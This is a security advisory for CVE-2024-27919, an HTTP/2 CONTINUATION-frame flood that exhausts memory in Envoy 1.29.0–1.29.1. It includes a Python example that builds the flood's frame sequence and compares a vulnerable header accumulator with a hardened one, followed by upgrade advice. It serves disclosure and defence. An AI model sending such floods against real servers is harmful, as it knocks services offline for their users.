PT-2024-2652 · Envoy+1

Bartek Nowotarski · Published 2024-01-05 · Updated 2025-09-04 · CVE-2024-27919

CVSS v2.0: 7.8 (High)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C
Name of the Vulnerable Software and Affected Versions: Envoy versions 1.29.0 through 1.29.1
Description: Envoy's HTTP/2 protocol stack is vulnerable to a flood of CONTINUATION frames. Envoy's HTTP/2 codec does not reset a request when the configured header map limits have been exceeded, so an attacker can open a stream with a HEADERS frame and keep sending CONTINUATION frames without ever setting the END_HEADERS flag; the codec keeps buffering the never-completed header block and its memory consumption grows without bound. The result is a denial of service through memory exhaustion, reachable by an unauthenticated remote client on any listener that accepts HTTP/2 (matching the CVSS vector: network, low complexity, no authentication, availability impact only).
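To make the mechanism concrete, the following is an added example (not Envoy's code and not part of this advisory): it builds the frame sequence of a CONTINUATION flood, then runs it through a toy server-side header-block accumulator in two modes, one shaped like the behaviour described above (limit exceeded, stream never reset, buffer keeps growing) and one hardened (RST_STREAM, buffer dropped, rest of the stream ignored). Frame and HPACK layouts follow RFC 9113 and RFC 7541; the 64 KiB limit, the RST_STREAM error code and all function names are assumptions made for this illustration.

```python
"""Added example (not Envoy's code): an HTTP/2 CONTINUATION flood on the
wire, and a toy header-block accumulator in vulnerable and hardened form.
Frame/HPACK layouts per RFC 9113 / RFC 7541; the limit, the error code
and every name below are constructed for illustration only."""
import struct

HEADERS, RST_STREAM, CONTINUATION = 0x1, 0x3, 0x9   # frame types
END_STREAM, END_HEADERS = 0x1, 0x4                  # frame flags
ENHANCE_YOUR_CALM = 0xB   # RST_STREAM error code chosen for this example


def frame(ftype, flags, stream_id, payload):
    """One HTTP/2 frame: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id."""
    return (struct.pack(">I", len(payload))[1:] + bytes([ftype, flags])
            + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload)


def hpack_int(n, prefix_bits=7):
    """HPACK integer with an N-bit prefix (RFC 7541 section 5.1)."""
    limit = (1 << prefix_bits) - 1
    if n < limit:
        return bytes([n])
    out = bytearray([limit])
    n -= limit
    while n >= 128:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def literal_header(name, value):
    """Literal header field without indexing, no Huffman coding (RFC 7541 6.2.2)."""
    return b"\x00" + hpack_int(len(name)) + name + hpack_int(len(value)) + value


def parse_frames(data):
    """Yield (type, flags, stream_id, payload) for each frame in a byte string."""
    while data:
        length = int.from_bytes(data[:3], "big")
        sid = struct.unpack(">I", data[5:9])[0] & 0x7FFFFFFF
        yield data[3], data[4], sid, data[9:9 + length]
        data = data[9 + length:]


def normal_request(stream_id):
    """A well-formed request: one HEADERS frame carrying the whole block, END_HEADERS set."""
    block = literal_header(b":method", b"GET") + literal_header(b":path", b"/")
    return frame(HEADERS, END_HEADERS | END_STREAM, stream_id, block)


def continuation_flood(stream_id, frames, filler=1000):
    """Attacker side: HEADERS with END_HEADERS cleared, then `frames`
    CONTINUATION frames that also never set END_HEADERS, so the header
    block never terminates and the peer has to keep buffering it."""
    data = frame(HEADERS, 0, stream_id, literal_header(b":method", b"GET"))
    junk = literal_header(b"x-filler", b"A" * filler)
    for _ in range(frames):
        data += frame(CONTINUATION, 0, stream_id, junk)
    return data


def receive(data, max_header_bytes, reset_on_overflow):
    """Server side: accumulate header-block fragments per stream.

    reset_on_overflow=False models the behaviour the advisory describes for
    1.29.0/1.29.1: the limit is crossed but the stream is never reset, so
    the buffer keeps growing with every CONTINUATION frame.
    reset_on_overflow=True models the fix: send RST_STREAM, drop the buffer
    and ignore the remainder of that stream's block.
    Returns (bytes still buffered, completed header blocks, frames to send)."""
    buffered, reset, completed, outgoing = {}, set(), 0, []
    for ftype, flags, sid, payload in parse_frames(data):
        if ftype not in (HEADERS, CONTINUATION) or sid in reset:
            continue
        buf = buffered.setdefault(sid, bytearray())
        buf += payload
        if len(buf) > max_header_bytes:
            if reset_on_overflow:
                outgoing.append(frame(RST_STREAM, 0, sid,
                                      struct.pack(">I", ENHANCE_YOUR_CALM)))
                del buffered[sid]
                reset.add(sid)
            # vulnerable path: limit noticed, nothing done, buffering continues
        elif flags & END_HEADERS:
            completed += 1          # block finished; would go to HPACK decoding
            del buffered[sid]
    return sum(len(b) for b in buffered.values()), completed, outgoing


if __name__ == "__main__":
    LIMIT = 64 * 1024   # constructed limit for the demo
    flood = continuation_flood(1, frames=100)
    print("vulnerable: %d bytes held" % receive(flood, LIMIT, False)[0])
    held, done, sent = receive(flood, LIMIT, True)
    print("hardened: %d bytes held, %d RST_STREAM sent" % (held, len(sent)))
    print("normal request on hardened: %d block completed" % receive(normal_request(3), LIMIT, True)[1])
```

The vulnerable mode ends the run holding the entire flood in memory for a single stream, and a real client can repeat this across streams and connections; the hardened mode holds nothing after the first frame that crosses the limit and still completes an ordinary request. A frame capture of real traffic can be fed to `parse_frames` to check whether a peer is sending header blocks that never carry END_HEADERS.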
Recommendations: Upgrade Envoy 1.29.0 or 1.29.1 to 1.29.2, which fixes the CONTINUATION flood. If you cannot upgrade immediately, either downgrade to 1.28.1 or earlier (the advisory treats those releases as unaffected) or disable the HTTP/2 protocol for downstream connections on the affected listeners until you can upgrade. Disabling HTTP/2 protects only the listeners where it is applied and does nothing for the ones left on the HTTP/2 or AUTO codec; after the change, verify that clients can no longer negotiate HTTP/2 against those listeners.

Exploit · Fix · DoS · Resource Exhaustion

Weakness Enumeration

Related Identifiers

BDU:2024-02719
BIT-ENVOY-2024-27919
CVE-2024-27919
GHSA-GGHF-VFXP-799R

Affected Products

Envoy
Red Os